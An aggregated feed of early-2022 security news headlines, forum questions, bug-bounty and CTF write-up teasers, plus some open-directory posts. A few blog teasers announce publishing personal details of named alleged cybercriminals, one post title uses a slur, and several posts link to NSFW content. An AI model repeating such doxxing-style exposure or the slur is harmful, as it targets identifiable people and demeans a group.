    I was sitting around today pulling my hair out at the prospect of automating rulebases, objects, etc across the separate vendors we use for our edge and internal firewall. Then the question hit me - why do we even have an internal firewall? Our edge FW is a Palo capable of everything the internal FW does and then some. So why can't I simply take everything hanging off the internal FW, move it to the edge FW, and save some money while making my life much easier? The only things I can come up with that we lose are vendor diversity and physical separation. Am I crazy or missing something? If not - would I even gain anything out of VIRTUALLY splitting those firewalls via different vsys on the Palos (I imagine not)? Thanks! submitted by /u/difflx2112 [link] [comments]  ( 4 min )
    Modbus Traversal?
    My company has an air\gas utility monitor that's connected over cellular back to the utility provider for monitoring and reporting. Currently isolated from anything else. Our Facilities team want to put a modbus TCP device on it for our own internal monitoring and reporting. Anyone have experience with this sort of setup? If someone were to gain access to the utility monitor over cellular could they then utilize modbus to control and traverse our network through the modbus\TCP gateway? submitted by /u/ThePaulHarrell [link] [comments]  ( 2 min )
    Any special tips for a soon to be CISO?
    Hello, I'm about to become the CISO for a school. I'm pretty confident on what I should do and what my first steps should be, but I would like to know if any of you have any uncommon tips? Any good podcast/news source, for example? Thanks! submitted by /u/elminstor [link] [comments]  ( 4 min )
    Computer and phone security
    1) Thank you all for your suggestions on my former question. I'd like to ask about some ways to secure an Android phone and a Windows computer. I am specifically looking for software and/or preferred settings to block intrusions from physical and wireless access in 2 scenarios: 1) Someone gets the phone/computer physically and 2) Someone accesses it wirelessly. I'd like to know what to do so the data are unreadable (preferably encrypted) in scenario 1 while still keeping the phone/computer capable of basic functioning, and so the phone/computer is harder to get into for attackers in (or before) scenario 2. Let's assume both devices are up-to-date with antivirus and firewall (when applicable). I'd like to know the best method even if it means going around some hidden functions of the devices. submitted by /u/O-0111 [link] [comments]  ( 1 min )
    Descriptive logic in Mobile Security
    Hi everyone! I'm a cybersecurity student and want to ask a slightly "stupid" question. In my program, there is a subject "Mobile security" where I was given the task to read a descriptive logic book of 500+ pages. So I wanted to ask, what does descriptive logic have to do with Mobile Security? Do you need to know and study this science to ensure the security of an application? submitted by /u/_hanabi_n [link] [comments]  ( 1 min )
    [MFA] Could a managed laptop count as a possession factor?
    Hi, I am supposed to secure a remote connection of company laptops with two factors. The devices are managed by Intune with conditional access. You need a company managed device to connect to the company network. Do you think that per definition the managed device with conditional access could count as a possession factor in a multi-factor authentication? Wikipedia says about the possession factor Possession factors ("something only the user has") have been used for authentication for centuries, in the form of a key to a lock. The basic principle is that the key embodies a secret that is shared between the lock and the key, and the same principle underlies possession factor authentication in computer systems. A security token is an example of a possession factor. One could argue that the device itself could count as a possession. It's not personalized but you still require one device out of a few hundred and one set of credentials to establish a connection. submitted by /u/Vertripper [link] [comments]  ( 4 min )
    Discovered IDOR vuln that reveal vaccination records
    Hello NetSec, Upon receiving my vaccination record, I discovered that I was able to retrieve other vaccination records along with other patient data by simply incrementing URL values. Worst part is that you can retrieve these records without being authenticated. The application initially authenticates patients to retrieve the records, but I found out you can reach the URL without being authenticated. Looking for suggestions to responsibly disclose this issue to the laboratory. I'm sure this is a violation of HIPAA. submitted by /u/nocmd [link] [comments]  ( 2 min )
    Career advice request
    I’m currently a web application developer going on 10 years now. I also have 7 years in systems and network administration. I’ve always wanted to get into cybersecurity, but with so many roles out there, most asking for several years in security, I’m not sure what I’m actually qualified for. Over the years my networking knowledge and muscle memory have depleted, and perhaps I'm feeling a bit imposter-syndromey. The last server OS I supported was Windows Server 2003, so you could say I’m not up to speed on the latest tech in the greater IT sphere. Also, I’m in my early 40s if that matters at all. Just looking for some general advice as to what, if anything, I should target my job search around. I’m definitely up to refresh/update my current skills with courses or whatever, providing it makes sense to even pursue at this stage in my career. Thanks in advance. submitted by /u/zushazero [link] [comments]  ( 1 min )
    How I approached Dependency Confusion!
    Hi People, In this blog, I will be sharing my approach for finding Dependency Confusion bugs. Continue reading on Medium »  ( 1 min )
    XSS Discovery and Exploitation With BurpSuite
    I’ve recently completed TryHackMe’s cross-site-scripting room and PortSwigger’s XSS labs and here’s what I’ve learned! This piece assumes… Continue reading on Medium »  ( 4 min )
    rDEX Bug Bounty
    Overview Continue reading on Medium »  ( 3 min )
    Vulnerability Capstone — Tryhackme
    Vulnerability Researching Continue reading on Medium »  ( 1 min )
    How I was able to buy a product for free — $$$
    Hi everyone, I hope you are well. It’s been a long time since I last wrote. So in this article I will share my finding… Continue reading on Medium »  ( 1 min )
    How I Found A Simple Stored XSS
    This is the story of how I found my first Stored XSS (“Cross Site Scripting”) vulnerability in a bug bounty program and a walk through on… Continue reading on Medium »  ( 3 min )
    SecWiki News 2022-01-31 Review
    SecWiki Weekly (Issue 413) by ourren; Challenges and Opportunities in Configuration-Error Injection Testing by ourren. For more of the latest articles, visit SecWiki  ( 2 min )
    Vulnerability in PostBus public transport platform exposed customer data
    Article URL: https://portswigger.net/daily-swig/vulnerability-in-postbus-public-transport-platform-exposed-customer-data Comments URL: https://news.ycombinator.com/item?id=30147933 Points: 1 # Comments: 0  ( 3 min )
    Inspector-gadget: exploit for a vulnerability in the Linux USB Gadget
    Article URL: https://github.com/szymonh/inspector-gadget Comments URL: https://news.ycombinator.com/item?id=30146403 Points: 2 # Comments: 0  ( 5 min )
    Puzzling RDP Cache - Putting the Pieces Together
    Good morning, It’s time for a new 13Cubed episode! Let's take a look at an easier way to reassemble RDP bitmap cache. And, if you're a little rusty on where to find the cache and how to export it, we'll cover that too! Episode: https://www.youtube.com/watch?v=9P845AMjJF0 Episode Guide: https://www.13cubed.com/episodes/ 13Cubed YouTube Channel: https://www.youtube.com/13cubed 13Cubed Patreon (Help support the channel and get early access to content and other perks!): https://www.patreon.com/13cubed submitted by /u/13Cubed [link] [comments]  ( 1 min )
    Failed GNFA, looking for tips and any advice for learning in a better way
    Just failed my GNFA and I feel really bad; can anyone help me out with a mental boost by advising how I could do better next go? submitted by /u/xray_icon [link] [comments]  ( 3 min )
    First Time Hacking The Cloud
    What’s going on hacker folks, this is shellbreak back again with another blog post, but this time, it will be about how I found my first… Continue reading on Medium »  ( 2 min )
    Hot model shares income from her racy OnlyFans clips to help veterans, and reveals a big dream
    The Daily Star reports the story of Cami Strella, a standout on the adult platform OnlyFans, who revealed her dreams for the future… Continue reading on Medium »
    Archive of software for the Tandy Radio Shack - TRS-80 Model III
    http://cpmarchives.classiccmp.org/trs80/Software/Model%20III/ circa 1979 submitted by /u/inoculatemedia [link] [comments]  ( 1 min )
    PDFs on Food science
    PDFs on Food safety, handling, manufacturing, storage, processing etc... http://154.68.126.6/library/Food%20Science%20books/ submitted by /u/amritajaatak [link] [comments]
    Some Engineering Company website Back end
    Appears to be the back end FTP server of an engineering company website. No clue if it's any useful or not. Maybe it is? https://elsmar.com/pdf_files/ submitted by /u/amritajaatak [link] [comments]  ( 1 min )
    Some ODs don't show up in Reddit search, but when trying to post it says that it has been posted by someone?
    Let's take this NSFW OD for example: https://pmagazine.co/wp-content/uploads/ One result shows up if I search for the domain. I decided to try to post it anyway since the URL he posted doesn't work anymore. When I tried to post there's a message about a duplicate post from a totally different user with the same URL. Why didn't that one show up when searching for "pmagazine"? There should be at least 2 results but only 1 is showing. submitted by /u/Boobalizer [link] [comments]  ( 1 min )
    Tranny hardcore videos (NSFW. Not my thing but who am I to judge)
    submitted by /u/Boobalizer [link] [comments]
    Building Custom Empire Modules
    submitted by /u/DLLCoolJ [link] [comments]
    How do you get open-source releases of vulnerabilities and other cyber threat news?
    It seems like Twitter is the answer, but I'm curious if I'm missing some sort of centralized hub for this kind of information that is free of unimportant information. What do you personally use? submitted by /u/Hymnosi [link] [comments]  ( 1 min )
    Can you "DDOS" someone through their public IP without being connected to each other in any way?
    A friend came up to me and told me that someone was "DDOSing" him. He said he got his computer IP from a video game server and he "DDOsed" him. How could he tell? He said he noticed packet loss and he had a higher ping and it disconnected him from Discord or something, they were in a call the whole time when it happened. My friend changed his PC public IP with some Windows settings after that. Now my friend believes that this guy is some big brain hacker and I can't convince him he is not, I don't want him to believe that this guy is in control of his security. Would also love to know what exactly happened and what this script kiddie could've. submitted by /u/AnnoyingN-wah [link] [comments]  ( 2 min )
    Whats the best way to secure 1) An Android phone 2) A Windows PC and 3) Home and company network?
    Hello! I'd like to know 1) how to secure an Android phone (even if it means gaining root access) while keeping basic usability, 2) how to secure a Windows computer against outside attacks (also while keeping basic functionality), and 3) how to secure a home and company network against attacks and data leaks. submitted by /u/O-0111 [link] [comments]  ( 2 min )
    [Serious] How Fast would Quantum Computers Crack Passwords/Tokens/Logins?
    From this video I watched from my Youtube feed, I'm aware of that quantum computers would be extremely fast in computing speed, but how fast would they be able to crack things that are say: Passwords 20, 50, 100 random-characters long with just ASCII input Passwords 20, 50, 100 random-characters long that utilize ASCII, Unicode, and non-standard characters The two same concepts above, but with random words like "water", "trampoline", etc. dropped randomly into the passphrases so it's just not jumbled, and requires a full dictionary of words to crack. Randomized session-login tokens, like used for Discord, Google, browser cookies in general. Weak, typical username + password combinations used for things like social media where both are shorter than 10 characters generally. Edit: T…  ( 5 min )
    Intro to Embedded RE Part 3: UART Discovery and Firmware Extraction via UBoot
    submitted by /u/wrongbaud [link] [comments]  ( 1 min )
    CVE-2022-0329 and the problems with automated vulnerability management
    submitted by /u/Most-Loss5834 [link] [comments]  ( 3 min )
    How to find locations to check for Russian military build-up?
    Methods for Investigating where Russian troops accumulated along Ukraine border Continue reading on Medium »  ( 4 min )
    Walkthrough —Hacktoria: Geolocation 01
    I came across the Hacktoria website today whilst looking for OSINT information. If you navigate to “Practice” — “Geolocation” you’ll come… Continue reading on Medium »  ( 3 min )
    Why we must nurture positive ethics in “citizen-driven” OSINT
    As citizen-driven open source intelligence (OSINT) grows in popularity, so does the risk of techniques being used by bad actors. I outline… Continue reading on Medium »
    Spare GCFA Practice
    Hey all, anyone here have a spare GCFA practice they could wing this way? Despite multiple content run-throughs and a comprehensive index, I flunked both my practice exams :S Second fail was surprising as I felt confident! 2 weeks left now until the real thing, so hoping some more turbo study and another practice may boost the confidence. Cheers! submitted by /u/Gumps903 [link] [comments]  ( 1 min )
    Do the SANS Live Classes just reuse the slides from the book or do they have other slides to use during class time?
    Thanks! submitted by /u/curiousgal1996 [link] [comments]  ( 1 min )
    Recover Historical Firewall Logs
    Hi all, This relates to a computer running Windows 10 home. Several months ago a program made a request to make an outbound connection. This request was probably blocked by the default firewall. I would like to note any info about this request, particularly the date and time, but firewall logging was off. Is there somewhere else this would be stored? Thank you, and I'm sorry if this is the wrong forum for this. submitted by /u/KoosOomakey [link] [comments]  ( 1 min )
    My Bug Bounty Adventure -2-
    Greetings everyone from the Promentorium bosporium. Continue reading on Medium »  ( 2 min )
    DARPA’s quest for the (almost) unhackable
    Welcome to Changelog by README! I’m your host, Blake Sobczak. Every Sunday, I’ll deliver cybersecurity news and analysis to your inbox… Continue reading on README_ »  ( 4 min )
    How I hacked my way to the top of DARPA’s hardware bug bounty
    Go inside one of the most technically challenging bug bounties ever with the researcher who subverted secure hardware designed by MIT and… Continue reading on README_ »  ( 9 min )
    How I exposed the teacher’s Aadhaar card, bank details on the college website.
    Hey fellow hackers and Bug hunters, Continue reading on InfoSec Write-ups »  ( 1 min )
    All About CSRF Flaw
    Continue reading on InfoSec Write-ups »  ( 2 min )
    Docker: From a beginner's perspective
    Docker is actually a docker engine that is used to create containers. Containers can be considered as VMs, but these VMs don’t have any… Continue reading on Medium »  ( 6 min )
    Price Tampering | Buying T-Shirts at 2 INR
    Hello Weirdos!!! Today I am going to share a write-up on a weird price tampering vulnerability I found a few months ago(currently patched). Continue reading on Medium »  ( 2 min )
    PORTSWIGGER WEB SECURITY - OS COMMAND INJECTION LAB SOLUTIONS
    OS Command Injection allows an attacker to execute arbitrary operating system (OS) commands on a web application server, and the application… Continue reading on Medium »  ( 4 min )
    How to get started hacking django applications
    Django is a Python-based web framework. In this writeup, I will teach you how to analyze Django-based applications. For this writeup, I… Continue reading on Medium »  ( 4 min )
    Critical full compromise of jarvis-new.urbanclap.com via weak session signing
    Urban Company disclosed a bug submitted by ian: https://hackerone.com/reports/1380121 - Bounty: $1500
    No character limit in password field
    UPchieve disclosed a bug submitted by tomyway: https://hackerone.com/reports/1462175
    Linux Privilege Escalation: Polkit (CVE 2021-3560)
    Introduction According to Red Hat, “Polkit stands for PolicyKit which is a framework that provides an authorization API used by privileged programs.” Pkexec is a The post Linux Privilege Escalation: Polkit (CVE 2021-3560) appeared first on Hacking Articles.  ( 7 min )
    SecWiki News 2022-01-30 Review
    Threat Scenario Analysis Framework by ourren; wJa, a (D&S&I)AST tool, by ourren. For more of the latest articles, visit SecWiki  ( 2 min )
    EISS-2021: Building a Multi-Layered Defense System, Lessons from a Large Internet Company's Zero Trust Journey
    Note: this talk was publicly presented at EISS-2021.
    INSEC-2020: Infrastructure Security in Large Enterprises
    Note: this talk was publicly presented at INSEC-2020.
    CTIC-2020: Cloud Attack and Defense, Practice and Reflections
    Note: this talk was publicly presented at CTIC-2020.
    BCS-2020: Using Offense to Drive Defense, Building Defenses from the Attacker's Perspective
    Note: this talk was publicly presented at BCS-2020.
    Cyberspace Administration of China Publishes Security Certification and Testing Results for Critical Network Equipment and Specialized Cybersecurity Products
    On January 29, the official website of the Central Cyberspace Affairs Commission Office (中央网信办) published 2022 Announcement No. 1, the "Announcement on the Unified Release of Security Certification and Security Testing Results for Critical Network Equipment and Specialized Cybersecurity Products".
    JAVA ON EARTH [KNIGHT-CTF]
    Given Data: Continue reading on Medium »  ( 2 min )
    The Time Machine — Weaponizing WaybackUrls for Recon, BugBounties , OSINT, Sensitive Endpoints and…
    You must have heard about time travel in movies, series and comics. Well here we are Nah i’m not joking you can travel back in time and… Continue reading on Medium »  ( 3 min )
    xeuldoc: Fetch information about any public Google document
    Introduction Continue reading on Medium »  ( 1 min )
    Basic OSINT Course
    Basic OSINT course — web searching for beginners — syllabus Continue reading on Medium »  ( 1 min )
    Finding the author of an illustration
    A while ago I spotted an image on reddit that really struck with me. I immediately knew I wanted to use it as my profile picture… Continue reading on Medium »  ( 2 min )
    In the beginning there was a tweet
    For the past year and a half I have been very interested in a career change into the cyber security and ethical hacking industry. I have… Continue reading on Medium »  ( 1 min )
    Quiztime — Random OSINT Challenge 6
    On Jan 13, 2022, Quiztime (contributor @N_Waters89) shared a new OSINT quiz with us. The objective was simple. We had to figure out where and w Continue reading on Medium »  ( 2 min )
    Windows vulnerability with new public exploits lets you become admin
    Article URL: https://www.bleepingcomputer.com/news/microsoft/windows-vulnerability-with-new-public-exploits-lets-you-become-admin/ Comments URL: https://news.ycombinator.com/item?id=30130902 Points: 7 # Comments: 0  ( 4 min )
    CVE-2022-0329 and the problems with automated vulnerability management
    Article URL: https://tomforb.es/cve-2022-0329-and-the-problems-with-automated-vulnerability-management/ Comments URL: https://news.ycombinator.com/item?id=30128872 Points: 9 # Comments: 4  ( 2 min )
    NMAP Vulnerability Scanning Scripts
    Article URL: https://github.com/nccgroup/nmap-nse-vulnerability-scripts Comments URL: https://news.ycombinator.com/item?id=30122224 Points: 2 # Comments: 0  ( 1 min )
    GitHub: The Red-Teamer’s Cheat-Sheet
    It’s no secret that GitHub has become one of the main information resources for red-team reconnaissance. I mean, why bother with complex… Continue reading on Medium »  ( 3 min )
    How To Handle Security Due Diligence During The M&A Process
    More often than not, we see our clients show interest in other companies. This pull can come in many different forms, but it’s usually… Continue reading on Medium »  ( 2 min )
    How I Made +$16,500 Hacking CDN Caching Servers — Part 3
    @bxmbn Continue reading on Medium »  ( 1 min )
    How I Made +$16,500 Hacking CDN Caching Servers — Part 2
    @bxmbn Continue reading on Medium »  ( 1 min )
    How I Made $15,000+ By Hacking Caching Servers — Part 1
    @bxmbn Continue reading on Medium »  ( 1 min )
    The Time Machine — Weaponizing WaybackUrls for Recon, BugBounties , OSINT, Sensitive Endpoints and…
    You must have heard about time travel in movies, series and comics. Well here we are Nah i’m not joking you can travel back in time and… Continue reading on Medium »  ( 3 min )
    A Summary of OAuth 2.0 Attack Methods
    The attacker grabs the authentication request to construct a malicious URL and deceives the logged-in user of the server to click it. Continue reading on Medium »  ( 2 min )
    TrustRecruit — BUG BOUNTY
    TrustRecruit will be allocating 750,000 TRT of the total supply of $TRT tokens to successful bounty hunters. Continue reading on Medium »  ( 2 min )
    2fa Bypass by changing Request method to DELETE
    Hello Everyone My name is Arth Bajpai, I’m from Lucknow, India, and I’m back with my third write-up about a 2fa Bypass which I Found a… Continue reading on Medium »  ( 3 min )
    My First Bug is P1 in Just 3 Minutes
    Hello Hackers and Security Guys, this is my first article on how to find a P1 bug Continue reading on Medium »  ( 1 min )
    Some lingerie photos NSFW (among other more boring stuff)
    submitted by /u/Boobalizer [link] [comments]
    PS3 sound files from games - Nicely sorted (Good speed. ~11 MB/s.)
    submitted by /u/Boobalizer [link] [comments]  ( 1 min )
    Misconfiguration in build environment allows DLL preloading attack
    Monero disclosed a bug submitted by nim4: https://hackerone.com/reports/896338
    XSS via X-Forwarded-Host header
    Omise disclosed a bug submitted by oblivionlight: https://hackerone.com/reports/1392935 - Bounty: $200
    How did my hosting service change my interface config?
    Hello AskNetsec, I got a VPS on a hosting service with Ubuntu on it, and I closed all the ports, changed the default SSH port, and changed the root and default user passwords. Then I asked my hosting service to change my public IP address. After that I saw my /etc/network/interfaces config changed... how did they do that? Even there is nothing in the history :\ Any info on how they did it is appreciated. Thanks! submitted by /u/g0g0gaga [link] [comments]  ( 1 min )
    How are you guys using IOCs in your SIEM environment?
    Hey everyone! I was curious how everyone is using IOCs in their SIEM environments. We are currently focusing on TTP’s but would love to have the ability to compare our logs against known positive IOCs. We are currently only using them in our EDR solution but not our SIEM. How are you guys using them in the SIEM platform? submitted by /u/RedNeckHutch [link] [comments]  ( 2 min )
    Just finished my first week of training in SOC. Anyone here familiar with MAStermind? Looking for resources to study over the weekend.
    SOC training has been so cool. The access I have is nuts. submitted by /u/ShittyF00dPorn [link] [comments]  ( 1 min )

    SecWiki News 2022-01-29 Review
    No news updated today~ For more of the latest articles, visit SecWiki

    Five Hacking Tips - Pkexec Linux Priv. Escalation
    submitted by /u/sysrisk

    FreeBuf Morning Report | Finnish diplomats' devices infected with Pegasus spyware; US revokes Chinese telecom company's license citing national security
    According to foreign media reports, the US Federal Communications Commission (FCC) revoked the license of China Unicom Americas, citing "serious national security concerns".
    Packer? Evasion? "Transparent Tribe" is looking for a new way forward for CrimsonRAT
    The Transparent Tribe group's main targets are the Indian government, military and related organizations, as well as activists and civil society in Pakistan.
    Social Responsibility | 斗象科技's "FUN心" Approach in 2021
    Shouldering the mission, fulfilling responsibility
    Building an online arsenal based on RestTemplate
    Use Spring Boot RestTemplate for automation tool development and achieve true team collaboration.
    Industrial Cyber Range Discussions (8) | Overview of industrial cyber ranges abroad
    This article shifts the perspective abroad and briefly reviews the state of development of industrial cyber ranges outside China.


    North Korea's Lazarus APT leverages Windows Update client, GitHub in latest campaign
    submitted by /u/dmchell

    Detecting and mitigating CVE-2021-4034: “Pwnkit” local privilege escalation
    submitted by /u/MiguelHzBz
    How to Analyze RTF Template Injection Attacks
    submitted by /u/ogunal00
    Pivoting with SSH Tunnels and Plink
    submitted by /u/m_edmondson
    Rip Raw - A tool to analyse the memory of compromised Linux systems.
    submitted by /u/0x636f6f6c
    Stop Storing Secrets In Environment Variables!
    submitted by /u/alxjsn
    ROP Chaining: Return Oriented Programming (study notes, tutorial)
    submitted by /u/Kondencuotaspienas
    "Stratus Red Team": open-source adversary emulation for AWS
    submitted by /u/thorn42
    The Cookies Parasite - Bypassing MFA with cookie theft
    submitted by /u/amirshk

    CTF Walkthrough | TryHackMe | Freshly
    Can you root this WordPress-style, SQL injection vulnerable machine? This CTF is about SQL injection and WordPress hacking. Developers… Continue reading on Medium »

    Fixing the Linux Kernel Vulnerability Cve-2022-0185
    Article URL: https://blog.accuknox.com/how-to-protect-from-cve-2022-0185-using-accuknox-opensource-tools/ Comments URL: https://news.ycombinator.com/item?id=30120314 Points: 1 # Comments: 0
    RHSB-2022-001 Polkit Privilege Escalation – (CVE-2021-4034)
    Article URL: https://access.redhat.com/security/vulnerabilities/RHSB-2022-001 Comments URL: https://news.ycombinator.com/item?id=30113422 Points: 1 # Comments: 0

    The Importance of Responsible Disclosure
    In my years as a security analyst I have worked with many clients who were in very dire straits. A website compromise is never a pleasant experience but there are a number of cases that stick out in my mind as particularly memorable: The ecommerce website owner whose business was on the brink of disaster after having to pay thousands of dollars in fines to Visa due to the presence of a credit card skimmer. Continue reading The Importance of Responsible Disclosure at Sucuri Blog.

    A bunch of movie scripts
    submitted by /u/theg721
    words
    submitted by /u/PM_ME_TO_PLAY_A_GAME
    horse food
    submitted by /u/PM_ME_TO_PLAY_A_GAME
    Russian and European rocket launch videos - Broadcast quality
    http://tvdownload.esa.int/ submitted by /u/inoculatemedia
    Magnetometer datasets from various space missions
    https://pds-ppi.igpp.ucla.edu/data/ The Planetary Plasma Interactions (PPI) Node of the Planetary Data System (PDS) archives and distributes digital data related to the study of the interaction between the solar wind and planetary winds with planetary magnetospheres, ionospheres and surfaces. The PPI Node is located at the Department of Earth, Planetary, and Space Sciences at the University of California, Los Angeles (UCLA). submitted by /u/inoculatemedia

    SecWiki News 2022-01-28 Review
    CodeQL: Advanced by ourren; How to get started with ICS vulnerability hunting by ourren; For more of the latest articles, visit SecWiki

    Summary of knowledge points for the DC series target machines
    This article summarizes the tools, commands and privilege escalation knowledge points used across the nine DC series target machines.
    VulnHub: Detailed penetration walkthrough of the DC-9 machine
    A very detailed DC-9 walkthrough.
    VulnHub: Detailed penetration walkthrough of the DC-8 machine
    A very detailed DC-8 walkthrough.
    VulnHub: Detailed penetration walkthrough of the DC-7 machine
    Very detailed notes on the DC-7 walkthrough.
    FreeBuf Morning Report | EU issues ultimatum to WhatsApp; North Korea's key services suspected to have suffered a DDoS attack
    The European Commission announced that WhatsApp must, within one month, clarify recent changes to its terms of service and privacy policy to ensure compliance with EU consumer protection law.
    The Cyberspace Administration of China releases the "Provisions on the Administration of Deep Synthesis in Internet Information Services (Draft for Comment)"
    The draft, comprising 25 articles, sets out regulatory requirements for generative and synthesis algorithms and for the production of audio and video content using new technologies and applications such as deep learning and virtual reality, further clarifies and refines the application scenarios of deep synthesis technology, and specifies the information security obligations of deep synthesis service providers and users.
    10 useful free data recovery tools for 2022
    10 useful free data recovery tools for 2022
    CVE-2021-4034 Linux Polkit privilege escalation: interpreting the vulnerability discovery approach
    One article to walk you through the full discovery process of the CVE-2021-4034 vulnerability.

    Paytm-Broken Link Hijacking
    Hello Everyone…. Continue reading on InfoSec Write-ups »
    TEJAS PANCHAL, ONE OF THE YOUNGEST CYBER SECURITY EXPERTS.
    We welcome increasingly more potent online vulnerabilities as we go into a digitized future with advanced information technology shaping… Continue reading on Medium »
    OpenLeverage Partners with Code4rena for Audit Contest to Enhance Security Measures
    Since our inception, OpenLeverage has been committed to developing a permissionless lending and margin trading protocol with aggregated… Continue reading on Medium »

    Exposing A Portfolio of Shadow Crew Cybercrime-Friendly Forum Communities IM Screen Names - An OSINT Analysis
    Dear blog readers, I've decided to share with everyone a currently active portfolio of IM screen names from the infamous Shadow Crew cybercrime-friendly forum community, part of a currently ongoing Technical Collection campaign, for the purpose of assisting everyone in their cyber attack and cyber threat actor profiling campaigns. Sample Shadow Crew cybercrime-friendly forum community IM screen names: …
    Exposing A Portfolio of Shadow Crew Cybercrime-Friendly Forum Communities ICQ UINs - An OSINT Analysis
    Dear blog readers, I've decided to share with everyone a currently active portfolio of IM screen names from the infamous Shadow Crew cybercrime-friendly forum community, part of a currently ongoing Technical Collection campaign, for the purpose of assisting everyone in their cyber attack and cyber threat actor profiling campaigns. Sample Shadow Crew cybercrime-friendly forum community ICQ UINs: … Stay tuned!
    Exposing A Portfolio of Shadow Crew Cybercrime-Friendly Forum Communities Personal Email Address Accounts - An OSINT Analysis
    Dear blog readers, I've decided to share with everyone a currently active portfolio of IM screen names from the infamous Shadow Crew cybercrime-friendly forum community, part of a currently ongoing Technical Collection campaign, for the purpose of assisting everyone in their cyber attack and cyber threat actor profiling campaigns. Sample Shadow Crew cybercrime-friendly forum community personal email address accounts: …
    Exposing A Portfolio of Shadow Crew Cybercrime-Friendly Forum Communities IP Addresses - An OSINT Analysis
    Dear blog readers, I've decided to share with everyone a currently active portfolio of IM screen names from the infamous Shadow Crew cybercrime-friendly forum community, part of a currently ongoing Technical Collection campaign, for the purpose of assisting everyone in their cyber attack and cyber threat actor profiling campaigns. Sample Shadow Crew cybercrime-friendly forum community IP addresses: …
    The Evolution of Encrypted IM Messaging Platforms - The Rise and Future of the OMEMO Protocol - An Analysis
    Dear blog readers, I've decided to share with everyone an article that I've been recently working on namely the rise of the OMEMO real-time Jabber/XMPP encryption protocol and also discuss in-depth the security risks involved in OMEMO type of communications including to offer practical security and privacy recommendation advice which I originally wrote for my ex-employer Armadillo Phone. In a modern and vibrant secure and encrypted mobile device ecosystem facing various hardware and physical security type of threats including the general rise of insecure WiFi hotspots and various other factors including the rise of various nation-state and rogue and malicious advanced persistent threat type of malicious and fraudulent campaigns a new protocol has recently emerged called OMEMO basically lim…
    Exposing a Currently Active Portfolio of Rogue and Fake Tech Support Scam Domains Portfolio - An OSINT Analysis
    Dear blog readers, I've decided to share with everyone a currently active portfolio of fake and rogue tech support scam domains with the idea to assist everyone in their cyber attack attribution efforts. Sample rogue, fraudulent and malicious tech support scam domains include: …
    Profiling FBI's Most Wanted Iran-based Cybercriminals - Mohammad Sagegh Ahmadzadegan - An OSINT Analysis
    In this post I've decided to expose and offer personally identifiable information on the Iran-based cybercriminal known as Mohammad Sagegh Ahmadzadegan for the purpose of assisting U.S. Law Enforcement on its way to track down and prosecute the cybercriminals behind these campaigns. Sample personally identifiable information on Mohammad Sagegh Ahmadzadegan includes: … Sample personally identifiable photos of Mohammad Sagegh Ahmadzadegan include: Stay tuned!
    Profiling FBI's Most Wanted Cybercriminal Mujtaba Raza from Forwarderz and SecondEye Solution - An OSINT Analysis
    In this post I've decided to offer an in-depth, practical and relevant OSINT analysis of FBI's Most Wanted Cybercriminal Mujtaba Raza from the Forwarderz and SecondEye Solution fake documents and IDs selling Pakistan-based rogue, fraudulent and malicious online enterprise, with the idea to assist U.S. Law Enforcement on its way to track down and prosecute the cybercriminals behind these campaigns. … Sample Web sites known to have been used by Forwarderz and SecondEye Solution: … Sample screenshots of various Forwarderz and SecondEye Solution domains include: Stay tuned!
    A Peek Inside Today's Modern RATs (Remote Access Tools) and Trojan Horses C&C (Command and Control) Communication Channels - An OSINT Analysis
    Dear blog readers, I've decided to share with everyone a currently active portfolio of RATs (Remote Access Tools) and trojan horses C&C (Command and Control) communication channels, including actual currently active names of RATs (Remote Access Tools) and trojan horses, with the idea to assist everyone in their cyber attack and cyber attribution campaigns, where the C&C (Command and Control) communication channels which I'll share exclusively rely on and use static and dynamic DNS and IP providers for the actual C&C infrastructure, which is a common TTP (Tactics, Techniques and Procedures) for this type of malicious software release. Sample RATs (Remote Access Tools) and trojan horses names currently in circulation in 2021 include: Casa RAT Back Orifice Bandook RAT Dark Comet Rat Cerberus Cybergate…
    Exposing a Currently Active CoolWebSearch Rogue and Malicious Domains Portfolio – Part Three – An OSINT Analysis
    Dear blog readers, I've decided to share with everyone yet another batch of currently active rogue and malicious CoolWebSearch domains with the idea to assist everyone in their cyber attack attribution campaigns, including cyber threat actor attribution campaigns. Sample currently active rogue and malicious CoolWebSearch domains portfolio: …
    Profiling a Currently Active Personal Email Address Portfolio of Members of Iran's Ashiyane Digital Security Team - An OSINT Analysis
    Dear blog readers, I've decided to share with everyone a currently active personal email portfolio belonging to members of Iran's Ashiyane Digital Security Team with the idea to assist everyone in their cyber attack or cyber threat actor attribution campaigns. Sample currently active personal emails known to belong to members of Iran's Ashiyane Digital Security Team: …
    Exposing a Currently Active CoolWebSearch Rogue and Malicious Domains Portfolio - Part Two – An OSINT Analysis
    Dear blog readers, I've decided to share with everyone yet another batch of currently active rogue and malicious CoolWebSearch domains with the idea to assist everyone in their cyber attack attribution campaigns, including cyber threat actor attribution campaigns. Sample currently active rogue and malicious CoolWebSearch domains portfolio: …
    Exposing a Currently Active CoolWebSearch Domains Portfolio - An OSINT Analysis
    Dear blog readers, I've decided to share with everyone a currently active portfolio of rogue and malicious CoolWebSearch IPs with the idea to help everyone in their cyber attack attribution campaign, including cyber threat actor attribution campaigns. Sample currently active rogue and malicious CoolWebSearch domains portfolio: …
    Profiling Yaroslav Vasinskyi from the Kaseya Ransomware Attack Campaign - An OSINT Analysis
    It appears that the U.S. Justice Department has recently made arrests in the Kaseya ransomware dropping campaign and I've decided to dig a little bit deeper and actually offer and provide the necessary actionable intelligence in the context of exposing the individuals behind these campaigns, in the context of assisting U.S. Law Enforcement on its way to track down and prosecute the cybercriminals behind these campaigns. Sample personally identifiable information on Yaroslav Vasinskyi: … including the following Web site which he is known to have been offering around…

    Are there any dynamic lists that are maintained to track VPNs egress points like nord or surfshark?
    submitted by /u/krattalak

    Targeted Healers: Open Source Analysis of Attacks on Hospitals and Medical Staff in Sudan
    Open source evidence shows how Sudan’s security forces attacked hospitals, medical workers and patients during recent protests in Khartoum. Continue reading on Medium »
    Try Hack Me’s OhSint: A Walkthrough
    Hello readers, welcome to this segment of my blog, as I guide you to solve the OhSint Room, hosted on TryHackMe. This room is a lot of fun! Continue reading on Medium »

    Anyone done the FLETC forensics courses?
    I'm doing forensics for the military and have an upcoming Digital Evidence Collection in an Enterprise Environment course at FLETC. Since a lot of members of this subreddit are LE, I was wondering if any of you have taken this course and, if so, how was it? submitted by /u/Sandyblanders

    Zero trust countdown: New OMB memo stresses urgency for modern AppSec
    A new OMB memo from the White House is underscoring the need for federal agencies to adopt zero trust architecture in AppSec. Here’s what you need to know.

    [Day 6] Web Exploitation Patch Management Is Hard | Advent of Cyber 3 (2021)
